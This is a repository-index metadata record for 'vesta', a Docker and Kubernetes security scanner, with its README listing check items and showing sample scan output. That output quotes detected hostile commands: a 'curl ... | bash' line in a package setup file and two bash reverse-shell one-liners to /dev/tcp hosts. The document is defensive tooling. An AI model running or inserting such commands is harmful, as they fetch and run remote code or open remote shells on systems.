{"id":37148047,"url":"https://github.com/kvesta/vesta","last_synced_at":"2026-01-14T17:28:36.680Z","repository":{"id":64209189,"uuid":"573715464","full_name":"kvesta/vesta","owner":"kvesta","description":"A static analysis of vulnerabilities, Docker and Kubernetes cluster configuration detect toolkit based on the real penetration of cloud computing","archived":false,"fork":false,"pushed_at":"2025-05-28T16:28:16.000Z","size":4123,"stargazers_count":199,"open_issues_count":1,"forks_count":29,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-05-28T17:41:42.334Z","etag":null,"topics":["cluster-analysis","docker","go","kubernetes","vesta","vulnerability-scanners"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kvesta.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2022-12-03T07:31:51.000Z","updated_at":"2025-05-28T16:28:20.000Z","dependencies_parsed_at":"2023-10-01T12:39:30.620Z","dependency_job_id":"6a83a358-157b-4f75-aef5-b966c420de63","html_url":"https://github.com/kvesta/vesta","commit_stats":{"total_commits":80,"total_committers":5,"mean_commits":16.0,"dds":0.125,"last_synced_commit":"dab816ee18105ccdd5e1c3bfffcdedb08841c478"},"previous_names":[],"tags_count":11,"template":false,"template_full_name":null,"purl":"pkg:github/kvesta/vesta","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kvesta%2Fvesta","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kvesta%2Fvesta/tags","releases
_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kvesta%2Fvesta/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kvesta%2Fvesta/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kvesta","download_url":"https://codeload.github.com/kvesta/vesta/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kvesta%2Fvesta/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28427885,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-14T16:38:47.836Z","status":"ssl_error","status_checked_at":"2026-01-14T16:34:59.695Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cluster-analysis","docker","go","kubernetes","vesta","vulnerability-scanners"],"created_at":"2026-01-14T17:28:35.939Z","updated_at":"2026-01-14T17:28:36.671Z","avatar_url":"https://github.com/kvesta.png","language":"Go","funding_links":[],"categories":["云安全"],"sub_categories":[],"readme":"\u003cp align=\"center\" style=\"text-align: center\"\u003e\n    \u003cimg src=\"https://user-images.githubusercontent.com/35037256/212051309-56468d85-4132-4780-9722-d1c0dcc79b1b.png\" width=\"55%\"\u003e\n\u003cbr/\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n  A static analysis of vulnerabilities, 
Docker and Kubernetes cluster configuration detect toolkit based on the real penetration of cloud computing.\n\u003c/p\u003e\n\n\u003cdiv align=\"center\"\u003e\n\u003cstrong\u003e\n\u003csamp\u003e\n\n[English](README.md) · [简体中文](README.zh-Hans.md)\n\n\u003c/samp\u003e\n\u003c/strong\u003e\n\u003c/div\u003e\n\n## Overview\n\nVesta is a static analysis of vulnerabilities, Docker and Kubernetes cluster configuration detect toolkit. It inspects Kubernetes and Docker configurations,\ncluster pods, and containers against safe practices.\n\u003cbr/\u003e\n\u003cbr/\u003e\nVesta is a flexible toolkit which can run on physical machines in different types of systems (Windows, Linux, MacOS).\n\n## What can vesta check\n\n\u003e Scan\n- Supported scan inputs\n  - image\n  - container\n  - filesystem\n  - vm (TODO)\n- Scan for vulnerabilities in packages installed by the major package managers\n  - apt/apt-get\n  - rpm\n  - yum\n  - dpkg\n- Scan for malicious packages and vulnerabilities in language-specific packages\n  - Java (Jar, War; major library: log4j)\n  - NodeJs (NPM, YARN)\n  - Python (Wheel, Poetry)\n  - Golang (Go binary)\n  - PHP (Composer; major frameworks: laravel, thinkphp, wordpress, wordpress plugins etc.)\n  - Rust (Rust binary)\n  - Others (other vulnerabilities that may allow a container escape, and checks for suspicious poisoned images)\n\n\u003e Docker\n\n| Supported | Check Item                | Description                                                            | Severity                  | Reference                                                                                   |\n|-----------|---------------------------|------------------------------------------------------------------------|---------------------------|---------------------------------------------------------------------------------------------|\n| ✔         | PrivilegeAllowed          | Privileged module is allowed.                                          
| critical                  | [Ref](https://github.com/kvesta/vesta/wiki/Capabilities-and-Privileged-Checking-References) |\n| ✔         | Capabilities              | Dangerous capabilities are enabled.                                    | critical                  | [Ref](https://github.com/kvesta/vesta/wiki/Capabilities-and-Privileged-Checking-References) |\n| ✔         | Volume Mount              | A dangerous host location is mounted.                                  | critical                  | [Ref](https://github.com/kvesta/vesta/wiki/Volume-Mount-Checking-References)                |\n| ✔         | Docker Unauthorized       | Port 2375 is open and unauthenticated.                                 | critical                  | [Ref](https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce/README.md)       |\n| ✔         | Kernel version            | Kernel version is one with a known container escape.                   | critical                  | [Ref](https://github.com/kvesta/vesta/wiki/Kernel-Version-References)                       |\n| ✔         | Network Module            | Network mode is `host` and containerd version is less than 1.41.       | critical/medium           |                                                                                             |\n| ✔         | Pid Module                | PID mode is `host`.                                                    | high                      |                                                                                             |\n| ✔         | Docker Server version     | Server version is a known vulnerable version.                          | critical/high/ medium/low |                                                                                             |\n| ✔         | Docker env password check | Check for weak database passwords in environment variables.            
| high/medium               |                                                                                             |\n| ✔         | Docker History            | Docker layers and environment contain dangerous commands.              | high/medium               |                                                                                             |\n| ✔         | Docker Backdoor           | Docker env command contains malicious commands.                        | critical/high             |                                                                                             |\n| ✔         | Docker Swarm              | Docker swarm has dangerous config or secrets, or containers are unsafe.| medium/low                |                                                                                             |\n| ✔         | Docker supply chain       | Docker supply chain has vulnerable configurations.                     | critical/high/ medium     | [Ref](https://github.com/kvesta/vesta/wiki/Docker-supply-chain-Checking-References)         |\n\n---\n\n\n\u003e Kubernetes\n\n| Supported | Check Item                                               | Description                                                                | Severity                  | Reference                                                                                           |\n|-----------|----------------------------------------------------------|----------------------------------------------------------------------------|---------------------------|-----------------------------------------------------------------------------------------------------|\n| ✔         | PrivilegeAllowed                                         | Privileged module is allowed.                                              
| critical                  | [Ref](https://github.com/kvesta/vesta/wiki/Capabilities-and-Privileged-Checking-References)         |\n| ✔         | Capabilities                                             | Dangerous capabilities are enabled.                                        | critical                  | [Ref](https://github.com/kvesta/vesta/wiki/Capabilities-and-Privileged-Checking-References)         |\n| ✔         | PV and PVC                                               | PV mounts a dangerous location and is active.                              | critical/medium           | [Ref](https://github.com/kvesta/vesta/wiki/Volume-Mount-Checking-References)                        |\n| ✔         | RBAC                                                     | RBAC has unsafe configurations in a clusterrolebinding or rolebinding.     | high/medium/ low/warning  |                                                                                                     |\n| ✔         | Kubernetes-dashboard                                     | Checking `-enable-skip-login` and account permission.                      | critical/high/low         | [Ref](https://blog.heptio.com/on-securing-the-kubernetes-dashboard-16b09b1b7aca)                    |\n| ✔         | Kernel version                                           | Kernel version is one with a known container escape.                       | critical                  | [Ref](https://github.com/kvesta/vesta/wiki/Kernel-Version-References)                               |\n| ✔         | Docker Server version (k8s version less than v1.24)      | Server version is a known vulnerable version.                              | critical/high/ medium/low |                                                                                                     |\n| ✔         | Kubernetes certificate expiration                        | Certificate expires within 30 days.                                        
| medium                    |                                                                                                     |\n| ✔         | ConfigMap and Secret check                               | Check for weak passwords in ConfigMaps or Secrets.                         | high/medium/low           | [Ref](https://github.com/kvesta/vesta/wiki/ConfigMap-and-Secret-Checking-References)                |\n| ✔         | PodSecurityPolicy check (k8s version under v1.25)        | PodSecurityPolicy tolerates dangerous pod configurations.                  | high/medium/low           | [Ref](https://kubernetes.io/blog/2021/04/06/podsecuritypolicy-deprecation-past-present-and-future/) |\n| ✔         | Auto Mount ServiceAccount Token                          | The default service account token is auto-mounted.                         | critical/high/ medium/low | [Ref](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)          |\n| ✔         | NoResourceLimits                                         | No resource limits are set.                                                | low                       | [Ref](https://github.com/kvesta/vesta/wiki/Resource-limitation-Checking-References)                 |\n| ✔         | Job and Cronjob                                          | No seccomp or SELinux profile is set in a Job or CronJob.                  | low                       | [Ref](https://www.aquasec.com/cloud-native-academy/docker-container/docker-cis-benchmark/)          |\n| ✔         | Envoy admin                                              | Envoy admin interface is enabled and listens on `0.0.0.0`.                 | high/medium               | [Ref](https://www.envoyproxy.io/docs/envoy/latest/start/quick-start/admin#admin)                    |\n| ✔         | Cilium version                                           | Cilium is a known vulnerable version.                                      
| critical/high/ medium/low | [Ref](https://security.snyk.io/package/golang/github.com%2Fcilium%2Fcilium)                         |\n| ✔         | Istio configurations                                     | Istio is a vulnerable version or has vulnerable configurations.            | critical/high/ medium/low | [Ref](https://istio.io/latest/news/security/)                                                       |\n| ✔         | Kubelet 10250/10255 and Kubectl proxy                    | Port 10255/10250 is open and unauthenticated, or kubectl proxy is running. | high/medium/low           |                                                                                                     |\n| ✔         | Etcd configuration                                       | Etcd safe configuration checking.                                          | high/medium               |                                                                                                     |\n| ✔         | Sidecar configurations                                   | Sidecar has dangerous configurations.                                      | critical/high/ medium/low |                                                                                                     |\n| ✔         | Pod annotation                                           | Pod annotation has unsafe configurations.                                  | high/medium/ low/warning  | [Ref](https://github.com/kvesta/vesta/wiki/Annotation-Checking-References)                          |\n| ✔         | DaemonSet                                                | DaemonSet has unsafe configurations.                                       | critical/high/ medium/low |                                                                                                     |\n| ✔         | Backdoor                                                 | Backdoor detection.                                                        
| critical/high             | [Ref](https://github.com/kvesta/vesta/wiki/Backdoor-Detection)                                      |\n| ✔         | Lateral admin movement                                   | Pod specifies a master node.                                               | medium/low                |                                                                                                     |\n\n\n\n## Build\n\nVesta is built with Go 1.18.\n\n```bash\nmake build\n```\n\n## Quick Start\n\nExample of an image or container scan (use `-f` to read the input from a tar file):\n\n```bash\n# Image\nvesta scan image cve-2019-14234_web:latest\nvesta scan image -f example.tar\n\n# Container\nvesta scan container \u003cCONTAINER ID\u003e\nvesta scan container -f example.tar\n\n# Filesystem\nvesta scan fs \u003cpath_of_filesystem\u003e\n```\n\n\nOutput:\n\n```bash\n2022/11/29 22:50:00 Searching for image\n2022/11/29 22:50:19 Begin upgrading vulnerability database\n2022/11/29 22:50:19 Vulnerability Database is already initialized\n2022/11/29 22:50:19 Begin to analyze the layer\n2022/11/29 22:50:35 Begin to scan the layer\n\nDetected 216 vulnerabilities\n\n+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+\n| 208 | python3.6 - Django | 2.2.3           | CVE-2019-14232   |   7.5 | high     | An issue was discovered                                          |\n|     |                    |                 |                  |       |          | in Django 1.11.x before                                          |\n|     |                    |                 |                  |       |          | 1.11.23, 2.1.x before 2.1.11,                                    |\n|     |                    |                 |                  |       |          | and 2.2.x before 2.2.4. 
If                                       |\n|     |                    |                 |                  |       |          | django.utils.text.Truncator's                                    |\n|     |                    |                 |                  |       |          | chars() and words() methods                                      |\n|     |                    |                 |                  |       |          | were passed the html=True                                        |\n|     |                    |                 |                  |       |          | argument, t ...                                                  |\n+-----+                    +-----------------+------------------+-------+----------+------------------------------------------------------------------+\n| 209 |                    | 2.2.3           | CVE-2019-14233   |   7.5 | high     | An issue was discovered                                          |\n|     |                    |                 |                  |       |          | in Django 1.11.x before                                          |\n|     |                    |                 |                  |       |          | 1.11.23, 2.1.x before 2.1.11,                                    |\n|     |                    |                 |                  |       |          | and 2.2.x before 2.2.4.                                          |\n|     |                    |                 |                  |       |          | Due to the behaviour of                                          |\n|     |                    |                 |                  |       |          | the underlying HTMLParser,                                       |\n|     |                    |                 |                  |       |          | django.utils.html.strip_tags                                     |\n|     |                    |                 |                  |       |          | would be extremely ...             
                              |\n+-----+                    +-----------------+------------------+-------+----------+------------------------------------------------------------------+\n| 210 |                    | 2.2.3           | CVE-2019-14234   |   9.8 | critical | An issue was discovered in                                       |\n|     |                    |                 |                  |       |          | Django 1.11.x before 1.11.23,                                    |\n|     |                    |                 |                  |       |          | 2.1.x before 2.1.11, and 2.2.x                                   |\n|     |                    |                 |                  |       |          | before 2.2.4. Due to an error                                    |\n|     |                    |                 |                  |       |          | in shallow key transformation,                                   |\n|     |                    |                 |                  |       |          | key and index lookups for                                        |\n|     |                    |                 |                  |       |          | django.contrib.postgres.f ...                                    |\n+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+\n| 211 | python3.6 - numpy  | 1.24.2          |                  |   8.5 | high     | Malicious package is detected in                                 |\n|     |                    |                 |                  |       |          | '/usr/local/lib/python3.6/site-packages/numpy/setup.py',         |\n|     |                    |                 |                  |       |          | malicious command \"curl https://vuln.com | bash\" are             |\n|     |                    |                 |                  |       |          | detected.                                   
                     |\n+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+\n\nDocker Histories:\n+----+---------------+----------------------------+-------+-------+--------+--------------------------------+\n| ID |     NAME      | CURRENT/VULNERABLE VERSION | CVEID | SCORE | LEVEL  |          DESCRIPTION           |\n+----+---------------+----------------------------+-------+-------+--------+--------------------------------+\n|  1 | Image History | - / -                      | -     |   0.0 | high   | Confusion value found          |\n|    |               |                            |       |       |        | in ENV: 'command' with         |\n|    |               |                            |       |       |        | the plain text 'bash -i        |\n|    |               |                            |       |       |        | \u003e\u0026/dev/tcp/127.0.0.1/9999 0\u003e\u00261 |\n|    |               |                            |       |       |        | '.                             |\n+----+---------------+----------------------------+-------+-------+--------+--------------------------------+\n|  2 |               | - / -                      | -     |   0.0 | medium | Docker history has found the   |\n|    |               |                            |       |       |        | senstive environment with      |\n|    |               |                            |       |       |        | key 'SECRET_KEY' and value:    |\n|    |               |                            |       |       |        | 123456.                        
|\n+----+---------------+----------------------------+-------+-------+--------+--------------------------------+\n\n```\n\n\u003cdetails\u003e\n\u003csummary\u003eResult\u003c/summary\u003e\n\n![](https://user-images.githubusercontent.com/35037256/212480788-b2c77ff4-e484-49f8-b283-b0347de7d646.gif)\n\n\u003c/details\u003e\n\nExample of a Docker config scan:\n\n```bash\nvesta analyze docker\n```\n\nOr run with Docker:\n\n```bash\nmake run.docker\n```\n\nOutput:\n\n```bash\n2022/11/29 23:06:32 Start analysing\n2022/11/29 23:06:32 Getting engine version\n2022/11/29 23:06:32 Getting docker server version\n2022/11/29 23:06:32 Getting kernel version\n\nDetected 3 vulnerabilities\n\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n| ID |      CONTAINER DETAIL      |     PARAM      |             VALUE              | SEVERITY |          DESCRIPTION           |\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n|  1 | Name: Kernel               | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |\n|    | ID: None                   |                |                                |          | the CVE-2022-0492 with         |\n|    |                            |                |                                |          | CAP_SYS_ADMIN and v1           |\n|    |                            |                |                                |          | architecture of cgroups        |\n|    |                            |                |                                |          | vulnerablility, has a          |\n|    |                            |                |                                |          | potential container escape.    
|\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n|  2 | Name: vesta_vuln_test      | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |\n|    | ID: 207cf8842b15           |                |                                |          | the Dirty Pipe vulnerablility, |\n|    |                            |                |                                |          | has a potential container      |\n|    |                            |                |                                |          | escape.                        |\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n|  3 | Name: Image Tag            | Privileged     | true                           | critical | There has a potential container|\n|    | ID: None                   |                |                                |          | escape in privileged  module.  |\n|    |                            |                |                                |          |                                |\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n|  4 | Name: Image Configuration  | Image History  | Image name:                    | high     | Weak password found            |\n|    | ID: None                   |                | vesta_history_test:latest |    |          | in command: ' echo             |\n|    |                            |                | Image ID: 4bc05e1e3881         |          | 'password=test123456' \u003e        |\n|    |                            |                |                                |          | config.ini # buildkit'.        
|\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n```\n\nExample of Kubernetes config scan, start vesta:\n\n```bash\nvesta analyze k8s\n```\n\nOutput:\n\n```bash\n2022/11/29 23:15:59 Start analysing\n2022/11/29 23:15:59 Getting docker server version\n2022/11/29 23:15:59 Getting kernel version\n\nDetected 4 vulnerabilities\n\nPods:\n+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n| ID |           POD DETAIL           |             PARAM              |             VALUE              |         TYPE          | SEVERITY |          DESCRIPTION           |\n+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n|  1 | Name: vulntest | Namespace:    | sidecar name: vulntest |       | true                           | Pod                   | critical | There has a potential          |\n|    | default | Status: Running |    | Privileged                     |                                |                       |          | container escape in privileged |\n|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        
|\n+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n|    |                                | sidecar name: vulntest |       | Token:Password123456           | Sidecar EnvFrom       | high     | Sidecar envFrom ConfigMap has  |\n|    |                                | env                            |                                |                       |          | found weak password:           |\n|    |                                |                                |                                |                       |          | 'Password123456'.              |\n+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n|    |                                | sidecar name: sidecartest |    | MALWARE: bash -i \u003e\u0026            | Sidecar Env           | high     | Container 'sidecartest' finds  |\n|    |                                | env                            | /dev/tcp/10.0.0.1/8080 0\u003e\u00261    |                       |          | high risk content(score:       |\n|    |                                |                                |                                |                       |          | 0.91 out of 1.0), which is a   |\n|    |                                |                                |                                |                       |          | suspect command backdoor.      
|\n+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n|  2 | Name: vulntest2 | Namespace:   | sidecar name: vulntest2 |      | CAP_SYS_ADMIN                  | capabilities.add      | critical | There has a potential          |\n|    | default | Status: Running |    | capabilities                   |                                |                       |          | container escape in privileged |\n|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |\n+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n|    |                                | sidecar name: vulntest2 |      | true                           | kube-api-access-lcvh8 | critical | Mount service account          |\n|    |                                | automountServiceAccountToken   |                                |                       |          | and key permission are         |\n|    |                                |                                |                                |                       |          | given, which will cause a      |\n|    |                                |                                |                                |                       |          | potential container escape.    
|\n|    |                                |                                |                                |                       |          | Reference clsuterRolebind:     |\n|    |                                |                                |                                |                       |          | vuln-clusterrolebinding |      |\n|    |                                |                                |                                |                       |          | roleBinding: vuln-rolebinding  |\n+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n|    |                                | sidecar name: vulntest2 |      | cpu                            | Pod                   | low      | CPU usage is not limited.      |\n|    |                                | Resource                       |                                |                       |          |                                |\n|    |                                |                                |                                |                       |          |                                |\n+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n\nConfigures:\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n| ID |            TYPEL            |             PARAM              |                         VALUE                          | SEVERITY |          DESCRIPTION           |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n|  1 | K8s version less than v1.24 | kernel version               
  | 5.10.104-linuxkit                                      | critical | Kernel version is suffering    |\n|    |                             |                                |                                                        |          | the CVE-2022-0185 with         |\n|    |                             |                                |                                                        |          | CAP_SYS_ADMIN vulnerablility,  |\n|    |                             |                                |                                                        |          | has a potential container      |\n|    |                             |                                |                                                        |          | escape.                        |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n|  2 | ConfigMap                   | ConfigMap Name: vulnconfig     | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high     | ConfigMap has found weak       |\n|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n|  3 | Secret                      | Secret Name: vulnsecret-auth   | password:Password123                                   | high     | Secret has found weak          |\n|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       
|\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n|  4 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | high     | Key permissions with key       |\n|    |                             | vuln-clusterrolebinding |      | create, update | resources:                            |          | resources given to the         |\n|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | default service account, which |\n|    |                             | kind: ClusterRole | subject    |                                                        |          | will cause a potential data    |\n|    |                             | kind: Group | subject name:    |                                                        |          | leakage.                       
|\n|    |                             | system:serviceaccounts:vuln |  |                                                        |          |                                |\n|    |                             | namespace: vuln                |                                                        |          |                                |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n|  5 | RoleBinding                 | binding name: vuln-rolebinding | verbs: get, watch, list,                               | high     | Key permissions with key       |\n|    |                             | | rolename: vuln-role | role   | create, update | resources:                            |          | resources given to the         |\n|    |                             | kind: Role | subject kind:     | pods, services                                         |          | default service account, which |\n|    |                             | ServiceAccount | subject name: |                                                        |          | will cause a potential data    |\n|    |                             | default | namespace: default   |                                                        |          | leakage.                       
|\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n|  6 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | warning  | Key permission are given       |\n|    |                             | vuln-clusterrolebinding2 |     | create, update | resources:                            |          | to unknown user 'testUser',    |\n|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | printing it for checking.      |\n|    |                             | subject kind: User | subject   |                                                        |          |                                |\n|    |                             | name: testUser | namespace:    |                                                        |          |                                |\n|    |                             | all                            |                                                        |          |                                |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n```\n\n\u003cdetails\u003e\n\u003csummary\u003eResult\u003c/summary\u003e\n\n![](https://user-images.githubusercontent.com/35037256/212480704-c6e6f7ac-6531-4eda-b3a2-1ca99eeedfcf.gif)\n\n\u003c/details\u003e\n\n\n## Help information\n\n```bash\n$./vesta -h\nVesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit\n               Tutorial is available at https://github.com/kvesta/vesta\n\nUsage:\n  vesta [command]\n\nAvailable Commands:\n  analyze     Kubernetes analyze\n  completion  Generate the autocompletion script for the specified shell\n  help        Help about any 
command\n  scan        Container scan\n  update      Update vulnerability database\n  version     Print version information and quit\n\nFlags:\n  -h, --help   help for vesta\n\n```\n\n## Event\n\n### KCon 2023 Weapon list\n- [https://kcon.knownsec.com/index.php?s=bqp\u0026c=category\u0026id=2](https://kcon.knownsec.com/index.php?s=bqp\u0026c=category\u0026id=2)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkvesta%2Fvesta","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkvesta%2Fvesta","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkvesta%2Fvesta/lists"}